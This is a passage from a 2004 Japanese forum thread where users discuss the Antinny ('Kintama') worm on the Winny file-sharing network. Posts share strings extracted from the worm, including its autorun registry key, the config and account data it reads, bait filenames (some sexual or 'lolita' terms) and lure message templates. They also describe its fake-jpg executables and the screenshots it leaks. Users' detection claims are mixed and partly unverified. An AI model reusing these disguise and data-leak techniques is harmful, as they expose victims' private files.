アイコンもそのコンピュータで指定したフォルダのものになるから引っかかり易そう。

761 :[名無し]さん(bin+cue).rar:04/03/16 15:34 ID:YGLPukbA
シベリアの祭りで落としまくって自爆してる奴も多そうだね。
まぁ自業自得だけど。

762 :[名無し]さん(bin+cue).rar:04/03/16 15:36 ID:w/lWqoQy
>>761
シベリアじゃねえ、ニュー速だ。おまえ殺すぞ。

763 :[名無し]さん(bin+cue).rar:04/03/16 15:37 ID:cN3iYznY
中に入ってる文字を適当に抜き出してみました1
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Software\Borland\Locales
Software\Borland\Delphi\Locales
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
start logon autorun
(%d) explorer
UnZip32 解凍エラー 解凍できませんでした!
書庫ではないか、壊れています。
svchost spoolsv WINLOGON explorer System quickboot cfg config start login setup env loader autorun .exe
system.ini LastPath SciCalc
UpFolder.txt Path Up BBS BBS2 Down BBS CACHE Bbs2 BbsCache Cache2
.FolderSettings Readme.files System Volume Information
winny.ini DownFolderPath Option
winny.ini CacheFolderPath Option
シリアル シリアル集 Serial 最強シルアル集 Pandora シリアル集 Pandora これでなかったらあきらめろ
最新版 最新バージョン 更新済み アップデート 補強板 史上最強 写真集
ロリ写真集 ロリータ写真集 コスプレ写真集 個人撮影 コスプレ写真 ロリータ写真 コスプレ ロリ
月刊シリーズ40冊+3セット 欧州ティーン裏本詰め合わせ ロシア有料サイト Amature&TeenClub

764 :[名無し]さん(bin+cue).rar:04/03/16 15:38 ID:hbLks8Zg
          ♪  シベリア
     ♪ ヽoノ
         ヘ)
          >
シベリア

765 :[名無し]さん(bin+cue).rar:04/03/16 15:38 ID:cN3iYznY
中に入ってる文字を適当に抜き出してみました2
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  ∧_∧
 ( ´∀`)< ぬるぽ
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ    人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/ ←
 (_フ彡        /
Software\Microsoft\Windows NT\CurrentVersion RegisteredOwner RegisteredOrganization
Software\Microsoft\Internet Account Manager Default Mail Account
Software\Microsoft\Internet Account Manager\Accounts\ SMTP Email Address
Software\Microsoft\MSNMessenger User.NET Messenger Service
%s.txt %s[%s].txt

こんにちわ!%sの%sです(^_^)/
Winnyというとっても便利なツールをゲットしてしまいました。
インターネットに繋いでおくだけで色々なゲームやアプリがタダで手に入る優れものです。
なんと公開前の映画まで流れているんだからビックリです。
いつも落としてばかりでは悪いので、私もファイルを流してみますね。
誰か落としてくれるかな・・・(O_O)ドキドキ
まだまだWinny初心者ですがですが、これからもどんどんアップするので、
よろしくお願いします(^o^)/~~~
E-mail:
yy年mm月dd日
現在所持しているファイルのリスト:

766 :[名無し]さん(bin+cue).rar:04/03/16 15:39 ID:DG9QUD3i
【2ch一押しネタ】高速道路サービスエリアのトイレにて
http://ex4.2ch.net/test/read.cgi/news/1079417969/



767 :[名無し]さん(bin+cue).rar:04/03/16 15:39 ID:cN3iYznY
中に入ってる文字を適当に抜き出してみました3
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
%s の %s、%d歳。
去年まで金無し君だったけど、WinnyとWinMXで
二年でアプリ350ギガバイト貯めた。一度やってみなよ。
落とすだけ落としてアップせずに終了することもできるし、キーワードに「無修正」「動画」とか入れて
あとは放っておけば一晩でHDがエロムービーで一杯になる。
ソフトがほしけりゃネットで落とせばいいだけ。暇つぶしになる。
フォトショップとかMSオフィスとか色々あるのでマジでお勧め。
文句がある奴はここによこせや →

いつもお世話になっております。
%s の %s です。
この度、弊社ではファイル共有プログラム"Winny"による内部資料の放流サービスを開始いたしました。
長い間社内で眠っていた内部資料の数々を広く一般に公開し、有効に活用していただくことを目的とした革新的なサービスです。
貴社におかれましても、是非この機会にファイル共有プログラム"Winny"を導入されることをおすすめいたします。
今後とも何卒宜しく御願い申し上げます。
■お問い合わせ先
担 当:
E-mail:
現在放流しているファイルのリスト:

768 :[名無し]さん(bin+cue).rar:04/03/16 15:44 ID:6Y7C303y
delphiで組んだのか。
学生だな。

769 :[名無し]さん(bin+cue).rar:04/03/16 15:49 ID:YGLPukbA
いつの間にかシベリア解除になってたのか。

とりあえず、被害者によっては警察も出元探しのマジ捜査しそうで面白いね。

770 :[名無し]さん(bin+cue).rar:04/03/16 15:50 ID:PL1aGIl8
なんか待機ノードがかなりへった気がする
この騒動でNY停止させた香具師かなりいるんかな

771 :[名無し]さん(bin+cue).rar:04/03/16 15:59 ID:sagtWxNP
キンタマコレクションしてたらまさしくミイラとりがミイラになったよw
まぁネット接続切ってたから情報は流出してないけどなんか鬱だ。。。

って事で、俺のPCで起こった現象を簡単に書いておく。
>>95に書いてるけど俺のは実体験ねw

まず、感染するとwindows起動時にUpFolder.txtにupフォルダを追加する1文が追加される。
winnyフォルダの中にBbsCacheとかSystem Volume Infomationっていうフォルダができる。

それらのフォルダの中にはjpgに偽装したexeファイルが数個作られる。
いずれもwinnyで流れていそうなファイル名だったりする。
これらのフォルダ・ファイルは隠しファイル化されてる。
もちろん消去してもまた作成される。

いちおうUpFolder.txt.を読み取り専用にしたら再作成はしない。


772 :[名無し]さん(bin+cue).rar:04/03/16 16:01 ID:jWeextXq
祭りの後にさすらいを・・・

773 :[名無し]さん(bin+cue).rar:04/03/16 16:02 ID:dYPBVNwM
もうキンタマ、ノートン対応した?

774 :[名無し]さん(bin+cue).rar:04/03/16 16:03 ID:0aAoAlSY
リカバリーすれば直るのかいな?

775 :[名無し]さん(bin+cue).rar:04/03/16 16:03 ID:OdCSF0Tt
祭りでスレの流れが速くてよく分からないんだけど
感染してるってどうすれば分かるんだ?

776 :[名無し]さん(bin+cue).rar:04/03/16 16:03 ID:fn4/EaVd
>>771
報告乙
他スレは話題がチャットオヤジに向いててわからん

777 :[名無し]さん(bin+cue).rar:04/03/16 16:04 ID:VSGHmne1
そういやさっきPCつけたら昨日に続いて今日も定義更新したんだが・・まだ違うかな

778 :[名無し]さん(bin+cue).rar:04/03/16 16:05 ID:4ECEcnbk
解析してくれるのもありがたいが
一番知りたいのは>>775なわけで・・・。

779 :[名無し]さん(bin+cue).rar:04/03/16 16:06 ID:qLtv2fBB
>771と同じ状態になったら感染してるんだろう

780 :[名無し]さん(bin+cue).rar:04/03/16 16:06 ID:0IZEkopt
Winnyでウィルスがばらまかれていると聞いてやってきました。
キンタマウィルスって何ですか?

781 :[名無し]さん(bin+cue).rar:04/03/16 16:07 ID:Wx1HrFGQ
>>778
本当にあほだな

782 :[名無し]さん(bin+cue).rar:04/03/16 16:08 ID:COEYBszI
ところでキンタマっていつから拡散してたの?
二月の後半ぐらいからnyやってないんだけど大丈夫なんかなぁ?

783 :[名無し]さん(bin+cue).rar:04/03/16 16:08 ID:ezap6lOC
upfolder.txtを読み取り専用にするってのはいい対策かも

784 :[名無し]さん(bin+cue).rar:04/03/16 16:08 ID:IL5eHq8k
だれかキンタマのフラッシュ作らないか!!!!


785 :[名無し]さん(bin+cue).rar:04/03/16 16:10 ID:8v71CMZO
upフォルダ内のファイル表示onにしとけば、
キンタマで検索かければ表示されるんじゃないの?

786 :[名無し]さん(bin+cue).rar:04/03/16 16:11 ID:8Z6M5Tx0
>>783
属性書き換えしてるらしいぞ

787 :[名無し]さん(bin+cue).rar:04/03/16 16:11 ID:lugxkc7t
キンタマクラスタにしたらすげーでてきたよ

うほっ

788 :[名無し]さん(bin+cue).rar:04/03/16 16:12 ID:7apK52Ys
>>778
結局ny検索で使用者名+キンタマでなかったら感染(発病)してないよ
心配だったらノード切断+うp内ファイル表示で検索
なければとりあえず安心、すくなくともデスクトップは晒せれてない

789 :[名無し]さん(bin+cue).rar:04/03/16 16:14 ID:hoR0gWMt
要するに、nyのフォルダの中のUpFolder.txtに変な一文が書いてあったり
見知らぬフォルダが形成されてなければ大丈夫ってことですか?

790 :[名無し]さん(bin+cue).rar:04/03/16 16:16 ID:Se9AWEpj
>>789
変なexe踏んでなけりゃ大丈夫

791 :[名無し]さん(bin+cue).rar:04/03/16 16:17 ID:7apK52Ys
>>789
まあ、安心だと思うけど
うpフォルダがどこに生成されるのかわからないから
ny上で検索するのが一番かと思う
自分のうp情報にない物が流れるわけないんだから

792 :[名無し]さん(bin+cue).rar:04/03/16 16:19 ID:dYPBVNwM
うpされるのってデスクトップのSSでしょ?
他はユーザー名と何だっけか?

793 :[名無し]さん(bin+cue).rar:04/03/16 16:19 ID:d/PeRvaw
exe踏むようなアホはどうせ空のUpFolder.txtを読み取り専用にしておけばよろし。

794 :[名無し]さん(bin+cue).rar:04/03/16 16:19 ID:hoR0gWMt
サンクス。
念のためny起動でアップフォルダをキンタマで検索してみた。
引っかからなくて(´▽`)ホッ

795 :[名無し]さん(bin+cue).rar:04/03/16 16:20 ID:0aAoAlSY
>>792
デスクトップにあるファイルを自動アップロード

796 :[名無し]さん(bin+cue).rar:04/03/16 16:20 ID:fHXHq/jD
>>792
それだけじゃないっての
まとめサイト見るのをおすすめする

797 :[名無し]さん(bin+cue).rar:04/03/16 16:20 ID:T7g2+Xmx
読取専用にしてても属性まで変えられたら・・・
打つ手がないがないな

798 :[名無し]さん(bin+cue).rar:04/03/16 16:24 ID:dYPBVNwM
>>795.796
けど、nyを起動してなければ、なんら問題はないんでしょ?
(一応まとめサイトみましたが・・・・。)

799 :[名無し]さん(bin+cue).rar:04/03/16 16:24 ID:7apK52Ys
すでに感染してたら祈るしかないよな
まあ、うpに気を配ってたら普通はすぐに気付くけどな
「あれなんだよキンタマってって…」

800 :[名無し]さん(bin+cue).rar:04/03/16 16:25 ID:AnOasI7U
>>798
自動で起動するという話もあったようなのですが・・・
消してしまえばいいのかな?

801 :[名無し]さん(bin+cue).rar:04/03/16 16:26 ID:d/PeRvaw
>>797
属性も変えるのか。
ではセキュリティで設定すればOK。
でもXP Homeだと無理?

802 :[名無し]さん(bin+cue).rar:04/03/16 16:27 ID:HZlHJsqE
元はなんていうファイルだったのかいな>>31が第一感染者かもしれないん?
モー娘とか裏ビデオとかかな、モー娘はぜんぜん集めてないから被害者にはならないな
自分が集めてるものがキンタマのターゲットにされたら嫌だな。
今回ひっかからなかったのは運が良かったとしか・・・日ごろの行いがいいからかな?(´‐`)
キャシュ削除せずに、クラック版も使ってないしねヽ(´ー`)ノ

803 :[名無し]さん(bin+cue).rar:04/03/16 16:28 ID:AnOasI7U
>>801
全然OKじゃないと思うけどw

804 :[名無し]さん(bin+cue).rar:04/03/16 16:28 ID:4t8pg8fy
ウィニー1.14使ってるのですが
ためしに「キンタマ」でファイル検索
したら仮想ファイルが出てきたのですが
これは大丈夫でしょうか?
あと予防策も教えて下さい

805 :[名無し]さん(bin+cue).rar:04/03/16 16:29 ID:drho847B
世間一般で騒がれるようになる頃には
とても深刻な事態になっている気がする

ny1やって無くてよかった… 2次感染も考えるとそんな事言ってられないのかも

         作者:タイフォされてください

806 :[名無し]さん(bin+cue).rar:04/03/16 16:29 ID:dYPBVNwM
>>800
まじですか・・・・。
とほほ・・・・。

807 :[名無し]さん(bin+cue).rar:04/03/16 16:30 ID:1zUJJ7UT
ねえ、アニオタとかゲーオタが多いとかならわかるが、

なんでモーオタが多いんだ? もうとっくに落ち目だろ。

デスクトップの壁紙とかの話ね。

808 :[名無し]さん(bin+cue).rar:04/03/16 16:30 ID:7apK52Ys
>>804
君自身のキンタマだったら
仮想ファイルになってるわけなかろう

809 :[名無し]さん(bin+cue).rar:04/03/16 16:30 ID:d/PeRvaw
>>803
なぜ?

810 :[名無し]さん(bin+cue).rar:04/03/16 16:31 ID:AnOasI7U
>>806
まあ違法な君はACCSに捕まってしまえばいいよ。


811 :[名無し]さん(bin+cue).rar:04/03/16 16:31 ID:/6MTx1Kn
Winnyなんてやってるからだ
ザマミロ


812 :[名無し]さん(bin+cue).rar:04/03/16 16:31 ID:qLtv2fBB
ACCSに逮捕権有るんだろうか

813 :[名無し]さん(bin+cue).rar:04/03/16 16:31 ID:YGLPukbA
いろんな板のキン絡みスレ見てると、初心者臭いのが祭りにのせられて
いっぱい落としてるみたいだね。
さて、この中から新たな感染者が何人出るかw

814 :[名無し]さん(bin+cue).rar:04/03/16 16:31 ID:AnOasI7U
>>809
こっちが聞きたいくらいだが。

815 :[名無し]さん(bin+cue).rar:04/03/16 16:31 ID:cgdVVgeM
>>807
おまいさんほど若者じゃないってことよ!

816 :[名無し]さん(bin+cue).rar:04/03/16 16:32 ID:d/PeRvaw
>>814
理由は説明できないんだ。

817 :[名無し]さん(bin+cue).rar:04/03/16 16:32 ID:drho847B
>>804
ミイラ取りがミイラって
 これに関して十分ありえるのでは?感染対策も無い事だし
調子に乗ってあんまり落とさないほうがイイと思うぞ

818 :[名無し]さん(bin+cue).rar:04/03/16 16:32 ID:+oKh1pbv
( ´ー`)フゥー...

819 :[名無し]さん(bin+cue).rar:04/03/16 16:33 ID:AnOasI7U
>>816
じゃあ駄目じゃん。
正直無駄。

820 :[名無し]さん(bin+cue).rar:04/03/16 16:33 ID:sdAUyO5U
ウイルスに関係ない雑談は祭りスレでよろ

821 :[名無し]さん(bin+cue).rar:04/03/16 16:33 ID:Ekkjb0gg
祭の人の多さも異常だな
まんまとシベリアにのせられてる感じ


822 :[名無し]さん(bin+cue).rar:04/03/16 16:34 ID:d/PeRvaw
>>819
じゃなくてあんたに >>816 を言ってるの。

823 :[名無し]さん(bin+cue).rar:04/03/16 16:34 ID:62UQR9CJ
窓の手でマイコンピュータの使用者名は変えれたのだけど
C:\Documents and Settings\ここの名前
のメインユーザーは変更しようとすると
システムフォルダだから名前の変更や移動は出来ませんとでちゃう
これって変えれないの?
通販で購入しなきゃよかった・・・フルネーム登録して送ってくるんだもん

824 :[名無し]さん(bin+cue).rar:04/03/16 16:34 ID:YGLPukbA
>>812
ACCSは逮捕権だけじゃなく殺人許可も持ってる超法規的組織だよ。

825 :[名無し]さん(bin+cue).rar:04/03/16 16:36 ID:7apK52Ys
>>823
OS再インスコか
別アカウント作って全部共有全部移動

826 :[名無し]さん(bin+cue).rar:04/03/16 16:36 ID:HZlHJsqE
ウィルスって増殖目的だから
当然ぅぷされてるものの中に
増えるような細工とかしてんのかなーとか
思って今まで落とさなかったよ、怖くて。
ほとぼりがさめて、誰かが安全なキンタマ被害者のキャッシュ一覧とか
まとめてくれるのを祈ろう

827 :[名無し]さん(bin+cue).rar:04/03/16 16:36 ID:AnOasI7U
>>822
人生終わったくせに偉そうにwww

828 :[名無し]さん(bin+cue).rar:04/03/16 16:37 ID:qLtv2fBB
>>824
スゲェ

829 :[名無し]さん(bin+cue).rar:04/03/16 16:37 ID:d/PeRvaw
>>827
なんの知識もないキチガイに反応してしまった。
失敗。

830 :[名無し]さん(bin+cue).rar:04/03/16 16:37 ID:FnZi9OnC
きんたま収集のなかにきんたま感染ファイルが隠されてることってある?
jpegが偽装されてるのは拡張子を表示するでも見抜けない?

831 :[名無し]さん(bin+cue).rar:04/03/16 16:38 ID:AnOasI7U
>>829
君の対策では防げないって。
まあそれで対策した気になっていればいいじゃん。

人生終わるのはのは君。

832 :[名無し]さん(bin+cue).rar:04/03/16 16:41 ID:a2/LmAe9
感染してるか否か判別する方法教えろよー ヽ( `Д´)ノ

833 :[名無し]さん(bin+cue).rar:04/03/16 16:42 ID:drho847B
>>826
おれもそう思う。祭り参加者は本当に大丈夫なのかと

834 :[名無し]さん(bin+cue).rar:04/03/16 16:42 ID:7apK52Ys
>>826
そう考えるのが妥当だな
ウィルスの詳細がわかるまでキンタマ収集は控えるが吉

>>832
ちょっとはログを読め

835 :[名無し]さん(bin+cue).rar:04/03/16 16:42 ID:LphruD7R
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B&VSect=T
ウイルスバスター買いにいけよおめーら

836 :[名無し]さん(bin+cue).rar:04/03/16 16:44 ID:sdAUyO5U
>>832
>>665
過去ログ嫁。
関係ない話で流れ速いから嫁ない。
おまいら、もちつけよ。

837 :[名無し]さん(bin+cue).rar:04/03/16 16:44 ID:a2/LmAe9
感染してるか否か判別する方法教えろよー ヽ( `Д´)ノ

ログ読むのマンドクセ
チョコチョコっと書いておくれよーヽ( `Д´)ノ

838 :[名無し]さん(bin+cue).rar:04/03/16 16:45 ID:m9KtyIHe
二月以降winny起動してない奴は白
それ以降起動してる奴はグレー

839 :[名無し]さん(bin+cue).rar:04/03/16 16:45 ID:RIlTmqRy
ノートンアンチウイルス2004の最新ウイルス定義ファイルで、
723のfile2961.txtをウイルスチェックしたらスクリプトエラーが出て
スキャン出来なかったno

840 :[名無し]さん(bin+cue).rar:04/03/16 16:45 ID:a2/LmAe9
>>836

あんたいい人だ(゜∀゜)

841 :[名無し]さん(bin+cue).rar:04/03/16 16:46 ID:VIW/MDKV
どうなんでしょう

842 :[名無し]さん(bin+cue).rar:04/03/16 16:47 ID:YGLPukbA
自分で落とす必要は無いよなー
祭り馬鹿が落として遠隔ファイアウォールになってうぷしてくれるしw

843 :[名無し]さん(bin+cue).rar:04/03/16 16:48 ID:F/JguTgQ
>>837
おまいは感染している。以上。

844 :[名無し]さん(bin+cue).rar:04/03/16 16:48 ID:KNnYSwgQ
・EXE - ヤヴァイ!これは触らないように
・ZIP, LZH, RAR - これ自体を解凍したからといって「感染しない」
・JPG, GIF, PNG - これ自体は絶対に「今回のワームではない」
・HTM, HTML - これ自体は絶対に「今回のワームではない」

ただし、HTMLファイルや、中身はHTMLファイルの拡張子JPGファイルの中に
C:\Program Files\Winny\adsfjaosgnaosteiahjoifhoaisgtawt.EXEを開けという指示が書き込まれていて
なおかつ、C:\Program Files\Winny\adsfjaosgnaosteiahjoifhoaisgtawt.EXEがパソコンの中に設置されていれば
それが実行されてワームに感染する恐れがある。

845 :[名無し]さん(bin+cue).rar:04/03/16 16:48 ID:RET8ga1i
ここ最近Pandoraのウイルスがあったけど、今思うときんたまと同じ382KB。
もしかして日付で活動を変えるような奴だったんだろうか。

あときんたまは現在のところhtmlから自動で実行される場合がある。要注意。
他にもきんたまのなかにぬるぽらしきものも入ってた。

846 :[名無し]さん(bin+cue).rar:04/03/16 16:49 ID:VIW/MDKV
>>844
なんか本スレ読む限り、
そうも言い切れないようだが?

847 :[名無し]さん(bin+cue).rar:04/03/16 16:50 ID:sdAUyO5U
>>840
836だが、自分勝手な厨は氏ね。
ログも嫁ない池沼はnyするな。
祭りしたいだけならニュー速にでも逝け。

おまいの反応見て教えて後悔したわ。



848 :[名無し]さん(bin+cue).rar:04/03/16 16:50 ID:KNnYSwgQ
>>846
例えばどのレス番辺り?


849 :[名無し]さん(bin+cue).rar:04/03/16 16:52 ID:i1/pUAfE
たのしすぎ。こんなに笑ったの久しぶりだよ。自殺しなくてよかったー

850 :[名無し]さん(bin+cue).rar:04/03/16 16:52 ID:cpLw7P3B
キンタマ関係のファイルを集めるなら、ノートンがキンタマウィルスに
対応してからじゃないと危ないな…。

851 :[名無し]さん(bin+cue).rar:04/03/16 16:52 ID:hoR0gWMt
>ログ読むのマンドクセ

こういう事を言う奴に限ってデスクトップ晒しまくり
危機感あるならログぐらい浚いなさいよ

852 :840:04/03/16 16:52 ID:a2/LmAe9
Upfolder.txt 空だた(゜∀゜)b

853 :[名無し]さん(bin+cue).rar:04/03/16 16:53 ID:VIW/MDKV
>>848
実行しなくても感染した人多数だとか。
全部見ろよ。

854 :[名無し]さん(bin+cue).rar:04/03/16 16:54 ID:dYPBVNwM
きんたまで出来たjpg形式のデスクトップ画像が出ていたので見ずに即削除。
もしや感染しているのかと疑って、upのテキストがあったので開いたら、何も書いてない。
一応ny自体をDLフォルダ以外削除したが、どうなのでしょうか?
ちょっと心配なので、情報求む!(・ω・)/
ひょっとしたら自分の画像じゃなかったのかな、あれ・・・。
う〜ん、悩む。

855 :[名無し]さん(bin+cue).rar:04/03/16 16:54 ID:0aAoAlSY
取り合えず2,3ヶ月は様子見って所か
AVGの定義が更新されるまでは

856 :[名無し]さん(bin+cue).rar:04/03/16 16:55 ID:7apK52Ys
nyで検索して自分のふぐりが出てこなかったらあるわけないのだが・・・

857 :[名無し]さん(bin+cue).rar:04/03/16 16:55 ID:RIlTmqRy
>>852
空だからと言って安心しないように
現に今はアンチウイルスソフトは検出出来ないから

858 :[名無し]さん(bin+cue).rar:04/03/16 16:56 ID:I0luQ6Kp
流れ速いねぇ。こっちも雑談スレ化しそうだ。
ウィルスについてだが、今のところ
「特典写真.jpg                              .exe」
以外のものは見つかっていないんだよね?
それとこれは窓アイコンだよね?

859 :840:04/03/16 16:57 ID:a2/LmAe9
>>857

じゃあ>665の確認方法って意味なしおちゃん?(´・ω・`)

860 :[名無し]さん(bin+cue).rar:04/03/16 16:57 ID:4Pz40sRT
>>31
は作者

861 :[名無し]さん(bin+cue).rar:04/03/16 16:58 ID:jiFkbOtz
BbsCacheと言うのがあるのだが
これって元からあるっけ?

862 :[名無し]さん(bin+cue).rar:04/03/16 16:59 ID:2oy4IXwT
>>858
htmlでも、あるっぽいよ


863 :[名無し]さん(bin+cue).rar:04/03/16 16:59 ID:VIW/MDKV
>>859
現時点では対策っていうのは全てネタだと思ったほうがいい。
ていうか本スレ見れ!

864 :[名無し]さん(bin+cue).rar:04/03/16 17:00 ID:FnZi9OnC
フォルダアイコンクリックしてウィルス感染した人がいるらしい

865 :名無し募集中。。。:04/03/16 17:00 ID:5OQx+Mxu
一部情報が交錯してるようだけど
メールでnyで落としたファイル名を送りつけるのもあるらしいし

もしかして亜種も同時に放出されてたりして

866 :[名無し]さん(bin+cue).rar:04/03/16 17:01 ID:ffUzqDpQ
>>859
再感染と言うのが考えられるので安心するにはまだ早いと思うが?

867 :[名無し]さん(bin+cue).rar:04/03/16 17:01 ID:Q7TwZDIg
解決策その1
「キンタマ」を無視ワード追加
解決策その2
Winny使わない

868 :[名無し]さん(bin+cue).rar:04/03/16 17:02 ID:/Ip5O9f3
>>823.
解決済みかもしれないけど、
それは別アカウント(どうでも良い名前)を作って、
そちらにデータを移動させて、
その晒したくないアカウントを削除すればOKですよ。数分で可能です。

869 :[名無し]さん(bin+cue).rar:04/03/16 17:03 ID:sagtWxNP
>>858

・[キンタマ]俺のデスクトップ 安祥園 [04-03-11](ファイル詰め合わせ).jpg .exe
※アイコンはjpg

・上記をフォルダに偽装した シリアル(2)

・シリアル.folder

俺が確認できたのはこの3つ

870 :840:04/03/16 17:03 ID:a2/LmAe9
感染確認方法思いついたYO!

ここで自分のユーザー名晒して流れてるか聞けばいいんだ !!(゜∀゜)

871 :[名無し]さん(bin+cue).rar:04/03/16 17:03 ID:0aAoAlSY
>>861
感染おめでとう

872 :[名無し]さん(bin+cue).rar:04/03/16 17:03 ID:sdAUyO5U
流れが速すぎて有益な情報も流れてしまうので、
キンタマ対策スレ新規に建てていい?
それで建てるなら、
こちらは感染報告泣きつきなしの対策本部でいい?


873 :[名無し]さん(bin+cue).rar:04/03/16 17:04 ID:ocAOtKjT
>870
それはひょっとしてギャグで(ry

874 :[名無し]さん(bin+cue).rar:04/03/16 17:04 ID:9VALRPje
>>858 >>763 参照

875 :[名無し]さん(bin+cue).rar:04/03/16 17:05 ID:KNnYSwgQ
>>853
>実行しなくても感染した人多数だとか。
感染するような人は実行したことに気が付いてないだけだと思うが
もうちょっと解説&詳しい被害報告があれば教えてくれ


876 :[名無し]さん(bin+cue).rar:04/03/16 17:05 ID:7apK52Ys
>>861
ないな、残念ながら

感染してるか調べたいなら
nyで検索汁、ノード切断しててもいいから
お前が持ってなきゃキンタマは流れるわけないだろうが

877 :[名無し]さん(bin+cue).rar:04/03/16 17:05 ID:1G84rCta
ほとぼりが冷めるまでは無駄だと思うよ……。

それよりも君が“有益な情報”をテンプレ化する方が役に立つと思うよ。

878 :[名無し]さん(bin+cue).rar:04/03/16 17:05 ID:/FDhYdcZ
最近の定義ファイルが
トドキマシタ━━━━━(゚(゚∀(゚∀゚(☆∀☆)゚∀゚)∀゚)゚)━━━━━!!

879 :[名無し]さん(bin+cue).rar:04/03/16 17:05 ID:1G84rCta
アンカー忘れた。
>>872あてね。

880 :[名無し]さん(bin+cue).rar:04/03/16 17:06 ID:/FDhYdcZ
「最新の」

だった_| ̄|○

881 :[名無し]さん(bin+cue).rar:04/03/16 17:06 ID:SbSBqO2L
readme.html は前からあったよね・・・?
更新日時も相当旧いし。

882 :[名無し]さん(bin+cue).rar:04/03/16 17:07 ID:jY+Q9QTE
>>878
最近のだったら微妙だよなw

883 :[名無し]さん(bin+cue).rar:04/03/16 17:08 ID:sdAUyO5U
>>877
>>665とかまとめてるの漏れで、
新スレ用にいままでのをまとめてあるけどね。

だけど情報が錯綜してて>>665以上に踏み込めないんだよね。
だから報告スレと本部は分けて欲しい罠
まぁ分けても無駄だとは思ってるけどねw

884 :[名無し]さん(bin+cue).rar:04/03/16 17:08 ID:ZdiiB+D9
>>872
nao祭りが終われば少しは落ち着くだろ>本スレ
情報が分散するから立てなくて良いと思う。

885 :[名無し]さん(bin+cue).rar:04/03/16 17:08 ID:56Y7T0vz
>>878
笑わすなよ

886 :[名無し]さん(bin+cue).rar:04/03/16 17:08 ID:I0luQ6Kp
>>862
そりゃ>>741の事?だとするとそれはウィルス本体ではないね。
ってかWindowxXPのアイコン?
もしかしてWindowsXP以外じゃこのアイコン入ってなくて表示されないのか?

>>869
じゃあもう、見た目じゃ全く分からないのか。
ノートン対応するまで.exe開かない以外に方法ないかな。

887 :[名無し]さん(bin+cue).rar:04/03/16 17:08 ID:9VALRPje
>>763 にエラーメッセージのようなものがあるところを見ると

.zip                         .exe
.lzh                         .exe

とかも作ってそうだ

888 :861:04/03/16 17:09 ID:jiFkbOtz
どうやらリアルタイムで感染w
jpgクリックで感染みたいね
ユーザー名、SS等は無問題だからいいのだが

フォルダ情報にBbsCacheが追加されたのを確認

889 :[名無し]さん(bin+cue).rar:04/03/16 17:09 ID:XTcWmBWY
うpフォルダ作ってない漏れは大丈夫だね?

890 :[名無し]さん(bin+cue).rar:04/03/16 17:10 ID:56Y7T0vz
>>887
723のファイル先頭辺りに「unlha32.dll」や「unzip32.dll」の
記載があったので圧縮形の偽装もありえるな

891 :[名無し]さん(bin+cue).rar:04/03/16 17:11 ID:QiYLDQI4
readme.html踏んじゃったよ_| ̄|○
Program Filesの中にexeファイルを作って自動起動に設定してあったのは分かったけど
キンタマじゃなかったらそれ以外に何をするのか・・・

892 :[名無し]さん(bin+cue).rar:04/03/16 17:11 ID:ocAOtKjT
>889
キンタマに感染すると、自動的に作られるから安心は出来ない

893 :[名無し]さん(bin+cue).rar:04/03/16 17:11 ID:KNnYSwgQ
>>888
感染したついでにそのJPGファイルの名前とサイズを教えて
よければヘッダ部分の感想とか

894 :[名無し]さん(bin+cue).rar:04/03/16 17:12 ID:2oy4IXwT
>>892
ってことは、nyユーザー以外でも感染して流出フラグが立てば流出しちゃうのかな?


895 :[名無し]さん(bin+cue).rar:04/03/16 17:14 ID:9j5v/02+
・感染されたらregedit.exeがnotpad.exeで上書きされる。
(regedit.exeを起動したらメモ帳が起動する)。

・各exeファイルはそのアイコンの本来の動作も同時に行うので気づかない人も多い。
たとえばjpgのアイコンのexeを起動すると本当に画像が表示され、同時にウイルスのプログラムも実行される


896 :[名無し]さん(bin+cue).rar:04/03/16 17:14 ID:a2/LmAe9
とどのつまり感染してるか否かって調べる確実な術ないんじゃん?ヽ( `Д´)ノ

やい!ワーム作成者、ワクチンおくれ

897 :[名無し]さん(bin+cue).rar:04/03/16 17:15 ID:4ECEcnbk
にしてもこれ破壊力ありすぎるよ・・・
仕事関係やら身内・彼女・友人にキャッシュリストやSSが送られた日にゃ
人生フォーマットしかねない・・・つーかする・・・。

898 :[名無し]さん(bin+cue).rar:04/03/16 17:15 ID:cpLw7P3B
>>895のとおり
>>896
regedit.exeを起動してみればわかるんじゃ?

899 :854ですが・・・・:04/03/16 17:15 ID:dYPBVNwM
これって金○なんですかね?

900 :[名無し]さん(bin+cue).rar:04/03/16 17:16 ID:IjkyJH9B
感染してしまったorz
駆除しようとファイルを指名して実行するでレジストリエディタを起動させたら
なぜかメモ帳が起動してしまった、同じ症状が出たやついる?

901 :[名無し]さん(bin+cue).rar:04/03/16 17:16 ID:jiFkbOtz
>>893
jpg以外だとReadMeのフォルダをクリックしたんだけどそれだったのかな?
ファルダの中はクリックしてない

902 :[名無し]さん(bin+cue).rar:04/03/16 17:17 ID:cpLw7P3B
>>897
彼女に、モー娘。関係壁紙やロリ動画のハッシュリストを
見られたら死ぬでしょうな・・・。

903 :[名無し]さん(bin+cue).rar:04/03/16 17:17 ID:ocAOtKjT
>896
UpFolder.txtに実に覚えの無いうpフォルダが追加されているか否かで十分じゃないのか?

904 :[名無し]さん(bin+cue).rar:04/03/16 17:17 ID:9VALRPje
>>894 winny ネットワーク以外で拡散させるには別の手立てが必要になる

自らネットワークに接続しようとすると、今時のセキュリティソフトなら警告を出すから比較的難しい
ありうるとすればメールにexe添付ぐらいかと

905 :[名無し]さん(bin+cue).rar:04/03/16 17:17 ID:KNnYSwgQ
854はDLフォルダを残している辺りnyをまだ続ける気だな
どうなっても知らんからがんばれ

906 :[名無し]さん(bin+cue).rar:04/03/16 17:17 ID:7apK52Ys
>>896
nyで検索しろって
お前が持ってないものをどう他人が手に入れるというのだ・・・

907 :[名無し]さん(bin+cue).rar:04/03/16 17:18 ID:sagtWxNP
>>895
あー、まさしくその通り。
regeditもこいつのせいだったのか。。。

俺はフォルダアイコンを開いたら画像が出てきたので
逆にやられた…って気付いたけどね。

908 :[名無し]さん(bin+cue).rar:04/03/16 17:19 ID:Wx1HrFGQ
だからアホが面白がってキンタマダウソするなと

